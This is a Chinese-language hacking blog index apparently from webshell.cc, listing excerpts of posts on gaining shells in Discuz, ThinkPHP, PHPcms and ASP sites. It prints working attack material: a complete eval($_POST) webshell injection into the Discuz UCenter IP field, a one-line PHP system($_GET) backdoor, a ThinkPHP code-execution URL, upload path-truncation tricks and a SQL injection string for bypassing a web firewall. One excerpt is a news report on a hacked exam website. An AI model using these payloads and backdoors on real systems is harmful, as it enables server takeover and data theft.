discuz X2.5后台拿shell及修复

有管理员帐号及密码。  直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;//  就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过

- 阅读全文 -

整理asp漏洞与入侵方式

0x00 前言 0x10 WEBDAV 0x20 IIS6短文件名漏洞 0x30 网站源代码 0x40 网站备份文件、说明文件、数据库备份文件与robots.txt 0x41 网站备份文件 0x42说明文件 0x43数据库备份文件 0x44 Robots.txt 0x50 未验证的上传页面 0x51 经典的upload.asp/upfile.asp组合 0x52 与之类似的上传漏洞 0x53黑名单...

- 阅读全文 -

丢掉NC,介绍一种新的上传shell文件的方法

 今日低调在知道区发帖求助,说后台地址,用户名和密码都有,拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单就是本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。ljb17的方法是抓包,利用nc上传。 他这里路径有2种办法,第一个办法是和上面一样,添加*.asp; 第二种办法就是截断,直接在路径后...

- 阅读全文 -

ThinkPHP 2.1 漏洞可拿webshell

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈 晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我 我看了下  系统还是以前的那个think...

- 阅读全文 -

thinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 检测有两种情况 1. 可执行命令,这个估计是伪3.0版本? 交大定票 此站到可以执行命令 http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 可查看版本 http://webshell.cc/index.php/module...

- 阅读全文 -

广东人事考试局网站被黑 黑客称500元可改成绩

南都讯 记者张钊 刘倩 实习生李逸凡 前天晚上,广东省人事考试局网站被黑,“网上咨询”栏目上被黑客用来“做广告”,黑客私下声称,只要考生缴纳500元钱,就能帮助改动成绩。昨日,省人事考试局表示,黑客只是盗取了“网上咨询”栏目的账号和密码,但成绩数据库并未受到攻击,黑客自称能够改动成绩是个骗局。 黑客称汇款就能帮改成绩 昨日,有登录人事考试局网站的考生发现,主页上“网上咨询”栏目,几乎所有网友所提问...

- 阅读全文 -

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET['input']); ?> http://192.168.247.133:81/shell.php?input=dir &nbs...

- 阅读全文 -

PHPcmsV9任意文件读取漏洞拿Shell

作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解不了他的密码,其实我想说你丫的把黑阔当傻子?你能想到 的别人想不到,废话就不说了,看着就是了~~ 本地搭建的...

- 阅读全文 -

绕过安全狗注入小技巧

https://www.webshell.cc/member/ajax_membergroup.php?[url=mailto:00.&action=post&membergroup=@%60]action=post&membergroup=@`'[/url]` Union select pwd from ` where 1 or ` http://www.webshell....

- 阅读全文 -

PHP+MYSQL环境下的Cookies爆错注入实战

PHP+MYSQL环境下的Cookies爆错注入实战,混世魔王。 技巧源于技术,所以你在浏览混世魔王的技术博客的时候,会发现技术形式的文章居多,而且都还算详细,而技巧形式的文章,绝大多数是装逼标题党,内容都点到为止。技术形式的文章,你能看懂并发现问题,大家可以针对某个技术问题深入探讨研究,提升你我的技术,还可能会交到志同道合的朋友,而技巧形式的属于比较急功近利,用的人多了,结果只会被人滥用到死。 ...

- 阅读全文 -